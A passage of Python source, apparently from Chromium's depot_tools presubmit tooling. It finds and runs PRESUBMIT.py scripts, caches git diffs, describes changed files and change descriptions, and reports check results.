self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with 'base/containers/hash_tables.h' instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def SetTimeout(self, timeout):
self.thread_pool.timeout = timeout
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
presubmit script. For example, It can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof. Note that files are listed using the OS
path separator, so backslashes are used as separators on Windows.
"""
dir_with_slash = normpath('%s/' % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return list(filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter)))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug('LocalPaths: %s', paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self, affected_file, files_to_check=None,
files_to_skip=None, allow_list=None, block_list=None,
white_list=None, black_list=None):
"""Filters out files that aren't considered 'source file'.
If files_to_check or files_to_skip is None, InputApi.DEFAULT_FILES_TO_CHECK
and InputApi.DEFAULT_FILES_TO_SKIP is used respectively.
The lists will be compiled as regular expression and
AffectedFile.LocalPath() needs to pass both list.
Note: if files_to_check or files_to_skip is not set, and
white_list/allow_list or black_list/block_list is, then those values are
used. This is used for backward compatibility reasons.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
# TODO(https://crbug.com/1098560): Remove non inclusive parameter names.
if files_to_check is None and (allow_list or white_list):
warn('Use files_to_check in FilterSourceFile')
files_to_check = allow_list or white_list
if files_to_skip is None and (block_list or black_list):
warn('Use files_to_skip in FilterSourceFile')
files_to_skip = block_list or black_list
if files_to_check is None:
files_to_check = self.DEFAULT_FILES_TO_CHECK
if files_to_skip is None:
files_to_skip = self.DEFAULT_FILES_TO_SKIP
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, files_to_check) and
not Find(affected_file, files_to_skip))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return list(filter(source_file, self.AffectedTestableFiles()))
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in 'new' version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
# Compute a single diff for all files and parse the output; should
# with git this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the 'left hand side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the 'right hand
side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
return self._cached_new_contents[:]
def ChangedContents(self):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
if self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
self._cached_changed_contents = []
line_num = 0
for line in self.GenerateScmDiff().splitlines():
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
self._cached_changed_contents.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or 'tag') lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. 'FOO='
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or 'tag' lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def AddDescriptionFooter(self, key, value):
"""Adds the given footer to the change description.
Args:
key: A string with the key for the git footer. It must conform to
the git footers format (i.e. 'List-Of-Tokens') and will be case
normalized so that each token is title-cased.
value: A string with the value for the git footer.
"""
description = git_footers.add_footer(
self.FullDescriptionText(), git_footers.normalize_name(key), value)
self.SetDescriptionText(description)
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r'^[A-Z_]*$', attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def GitFootersFromDescription(self):
"""Return the git footers present in the description.
Returns:
footers: A dict of {footer: [values]} containing a multimap of the footers
in the change description.
"""
return git_footers.parse_footers(self.FullDescriptionText())
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
parsed = self.GitFootersFromDescription()
unsplit_footers = parsed.get('Bug', []) + parsed.get('Fixed', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a 'R:' git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(crbug.com/839208): Remove support for 'Tbr:' when TBRs are
# programmatically determined by self-CR+1s.
footers = self.GitFootersFromDescription().get('Tbr', [])
return sorted(set(tags + footers))
# TODO(crbug.com/753425): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = list(filter(file_filter, self._affected_files))
if include_deletes:
return affected
return list(filter(lambda x: x.Action() != 'D', affected))
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn('AffectedTeestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in 'new' version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, gerrit_obj, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
gerrit_obj: The GerritAccessor object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(gerrit_obj, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.items(),
masters2.items()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write('Warning, no PRESUBMIT.py found.\n')
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write('Running default presubmit script.\n')
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.values():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
gerrit_obj,
verbose):
"""Execute the post upload hook.
Args:
change: The Change object.
gerrit_obj: The GerritAccessor object.
verbose: Prints debug info.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, gerrit_obj, change))
if not results:
return 0
sys.stdout.write('\n')
sys.stdout.write('** Post Upload Hook Messages **\n')
exit_code = 0
for result in results:
if result.fatal:
exit_code = 1
result.handle()
sys.stdout.write('\n')
return exit_code
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None,
thread_pool=None, parallel=False, gerrit_project=None):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
self.gerrit_project = gerrit_project
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
presubmit_dir = os.path.dirname(presubmit_path)
os.chdir(presubmit_dir)
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
context['__args'] = (input_api, output_api)
# Get path of presubmit directory relative to repository root.
# Always use forward slashes, so that path is same in *nix and Windows
root = input_api.change.RepositoryRoot()
rel_path = os.path.relpath(presubmit_dir, root)
rel_path = rel_path.replace(os.path.sep, '/')
# Get the URL of git remote origin and use it to identify host and project
host = ''
if self.gerrit and self.gerrit.host:
host = self.gerrit.host
project = self.gerrit_project or ''
# Prefix for test names
prefix = 'presubmit:%s/%s:%s/' % (host, project, rel_path)
# Perform all the desired presubmit checks.
results = []
try:
if 'PRESUBMIT_VERSION' in context and \
[int(x) for x in context['PRESUBMIT_VERSION'].split('.')] >= [2, 0, 0]:
for function_name in context:
if not function_name.startswith('Check'):
continue
if function_name.endswith('Commit') and not self.committing:
continue
if function_name.endswith('Upload') and self.committing:
continue
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, prefix))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
else: # Old format
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, prefix))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
for f in input_api._named_temporary_files:
os.remove(f)
# Return the process to the original working directory.
os.chdir(main_path)
return results
def _run_check_function(self, function_name, context, prefix):
"""Evaluates a presubmit check function, function_name, in the context
provided. If LUCI_CONTEXT is enabled, it will send the result to ResultSink.
Passes function_name and prefix to rdb_wrapper.setup_rdb. Returns results.
Args:
function_name: a string representing the name of the function to run
context: a context dictionary in which the function will be evaluated
prefix: a string describing prefix for ResultDB test id
Returns: Results from evaluating the function call."""
with rdb_wrapper.setup_rdb(function_name, prefix) as my_status:
result = eval(function_name + '(*__args)', context)
self._check_result_type(result)
if any(res.fatal for res in result):
my_status.status = rdb_wrapper.STATUS_FAIL
return result
def _check_result_type(self, result):
"""Helper function which ensures result is a list, and all elements are
instances of OutputApi.PresubmitResult"""
if not isinstance(result, (tuple, list)):
raise PresubmitFailure('Presubmit functions must return a tuple or list')
if not all(isinstance(res, OutputApi.PresubmitResult) for res in result):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
def DoPresubmitChecks(change,
committing,
verbose,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None,
gerrit_project=None):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
Return:
1 if presubmit checks failed or 0 otherwise.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
if committing:
sys.stdout.write('Running presubmit commit checks ...\n')
else:
sys.stdout.write('Running presubmit upload checks ...\n')
start_time = time_time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel, gerrit_project)
if default_presubmit:
if verbose:
sys.stdout.write('Running default presubmit script.\n')
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
messages = {}
should_prompt = False
presubmits_failed = False
for result in results:
if result.fatal:
presubmits_failed = True
messages.setdefault('ERRORS', []).append(result)
elif result.should_prompt:
should_prompt = True
messages.setdefault('Warnings', []).append(result)
else:
messages.setdefault('Messages', []).append(result)
sys.stdout.write('\n')
for name, items in messages.items():
sys.stdout.write('** Presubmit %s **\n' % name)
for item in items:
item.handle()
sys.stdout.write('\n')
total_time = time_time() - start_time
if total_time > 1.0:
sys.stdout.write(
'Presubmit checks took %.1fs to calculate.\n\n' % total_time)
if not should_prompt and not presubmits_failed:
sys.stdout.write('Presubmit checks passed.\n')
elif should_prompt:
sys.stdout.write('There were presubmit warnings. ')
if may_prompt:
presubmits_failed = not prompt_should_continue(
'Are you sure you wish to continue? (y/N): ')
else:
sys.stdout.write('\n')
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format()
for error in messages.get('ERRORS', [])
],
'notifications': [
notification.json_format()
for notification in messages.get('Messages', [])
],
'warnings': [
warning.json_format()
for warning in messages.get('Warnings', [])
],
'more_cc': executer.more_cc,
}
gclient_utils.FileWrite(
json_output, json.dumps(presubmit_results, sort_keys=True))
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
sys.stdout.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return 1 if presubmits_failed else 0
finally:
os.environ = old_environ
def _scan_sub_dirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def _parse_files(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in _scan_sub_dirs(arg, recursive)])
return files
def _parse_change(parser, options):
"""Process change options.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GitChange if the change root is a git repository, or a Change otherwise.
"""
if options.files and options.all_files:
parser.error('<files> cannot be specified when --all-files is set.')
change_scm = scm.determine_scm(options.root)
if change_scm != 'git' and not options.files:
parser.error('<files> is not optional for unversioned directories.')
if options.files:
change_files = _parse_files(options.files, options.recursive)
